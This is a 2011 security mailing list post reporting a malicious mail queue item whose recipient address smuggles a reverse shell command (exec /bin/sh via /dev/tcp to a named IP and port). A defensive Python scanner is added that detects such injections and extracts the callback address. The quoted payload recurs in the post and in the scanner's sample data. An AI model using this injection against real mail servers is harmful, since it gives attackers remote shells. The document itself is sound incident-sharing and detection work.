[nsp-sec] Something odd in the mail queue. AS30496
Scott A. McIntyre
scott at howyagoin.net
Wed Feb 2 20:45:28 EST 2011
Hi teams,
I happened to look at my mail queue today and noticed the following item
sitting there:
-Queue ID- --Size-- ----Arrival Time---- -Sender/Recipient-------
C28E16089 367 Tue Feb 1 00:59:58 blue at dick.com
(temporary failure)
"root+:|exec /bin/sh
0</dev/tcp/72.249.152.50/45295 1>&0 2>&0"@mymailserver.com
Looking at the actual postfix queue item:
original_recipient="root+:|exec /bin/sh 0</dev/tcp/72.249.152.50/45295
1>&0 2>&0"
And:
log_client_address=216.104.47.74A
log_client_port=45738
log_helo_name=bluedick
log_protocol_name=SMTP
client_name=unknown
reverse_client_name=74.47.104.216.no-rdns.ord02.singlehop.net
dsn_orig_rcpt=rfc822;root+:"|exec /bin/sh 0</dev/tcp/72.249.152.50/45295
1>&0 2>&0"O<root+:|exec /bin/sh 0</dev/tcp/72.249.152.50/45295 1>&0
2>&0RLroot+:|exec /bin/sh 0</dev/tcp/72.249.152.50/45295 1>&0
2>&0 at mymailserver.com
So, on a whim, I poked at the server:
$ telnet 72.249.152.50 45295
Trying 72.249.152.50...
Connected to 72.249.152.50.
Escape character is '^]'.
Error! :-))s
At least one other person in our community has ACK'd seeing this (on
IRC) so I thought I'd pass it along for others.
Heads up to:
AS | IP | AS Name
30496 | 72.249.152.50 | COLO4 - Colo4Dallas LP
Cheers,
Scott A. McIntyre
Telstra AS1221
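As an added example (not part of Scott's post), here is a small defensive scanner for the kind of queue item described above. It assumes a postcat-style key=value dump of a Postfix queue file, where long values may wrap onto the next line and a stray record-type letter (the "A" after the client address in the post) can trail a value; the sample dumps are constructed to mirror the post's fields. It flags recipient addresses that carry pipe-to-command or /dev/tcp shell constructs and extracts the callback endpoint and the submitting client so they can be fed to blocklists or incident tickets.

```python
"""Scan Postfix queue-file dumps for recipient addresses that smuggle shell commands."""
import re
from typing import Dict, List, Optional, Tuple

# Substrings that never belong in a legitimate mailbox address.
INDICATOR_RE = re.compile(r"\||/dev/tcp/|\bexec\b|/bin/(?:ba)?sh\b")
# bash's /dev/tcp/<host>/<port> pseudo-device: extracting it yields the callback endpoint.
DEV_TCP_RE = re.compile(r"/dev/tcp/([0-9]{1,3}(?:\.[0-9]{1,3}){3})/([0-9]{1,5})")
IPV4_RE = re.compile(r"[0-9]{1,3}(?:\.[0-9]{1,3}){3}")
ATTR_RE = re.compile(r"^([A-Za-z_]+)=(.*)$")
# Queue-file attributes that hold a recipient address in one form or another.
RECIPIENT_KEYS = ("original_recipient", "dsn_orig_rcpt", "recipient")


def parse_queue_dump(text: str) -> Dict[str, str]:
    """Collect key=value attributes, joining lines that wrapped mid-value."""
    attrs: Dict[str, str] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            current = None
            continue
        m = ATTR_RE.match(line)
        if m:
            current = m.group(1)
            attrs[current] = m.group(2)
        elif current is not None:
            # Continuation of the previous attribute's wrapped value.
            attrs[current] += " " + line
    return attrs


def assess_queue_item(text: str) -> Dict[str, object]:
    """Return the submitting client and every recipient field carrying shell indicators."""
    attrs = parse_queue_dump(text)
    findings: List[Dict[str, object]] = []
    for key in RECIPIENT_KEYS:
        value = attrs.get(key)
        if value is None or not INDICATOR_RE.search(value):
            continue
        callback: Optional[Tuple[str, int]] = None
        m = DEV_TCP_RE.search(value)
        if m:
            callback = (m.group(1), int(m.group(2)))
        findings.append({"field": key, "value": value, "callback": callback})
    # A raw queue file can leave the next record's type byte glued to the address
    # (assumed explanation for the trailing "A" in the post), so keep only the IPv4 part.
    client: Optional[str] = None
    ip = IPV4_RE.search(attrs.get("log_client_address", ""))
    if ip:
        client = ip.group(0)
    return {"client_address": client, "findings": findings}


# Constructed sample mirroring the fields quoted in the post.
SAMPLE_DUMP = """\
original_recipient="root+:|exec /bin/sh 0</dev/tcp/72.249.152.50/45295
1>&0 2>&0"
log_client_address=216.104.47.74A
log_client_port=45738
log_helo_name=bluedick
log_protocol_name=SMTP
"""

# Constructed benign item for comparison.
BENIGN_DUMP = """\
original_recipient=alice@example.com
log_client_address=192.0.2.10
log_client_port=51000
"""

if __name__ == "__main__":
    for name, dump in (("suspicious", SAMPLE_DUMP), ("benign", BENIGN_DUMP)):
        print(name, assess_queue_item(dump))
```

Run it against `postcat -q <queue-id>` output (or a `postcat` dump of a held item) to triage; a non-empty `findings` list gives the queue operator the recipient field to hold and the client and callback addresses to report.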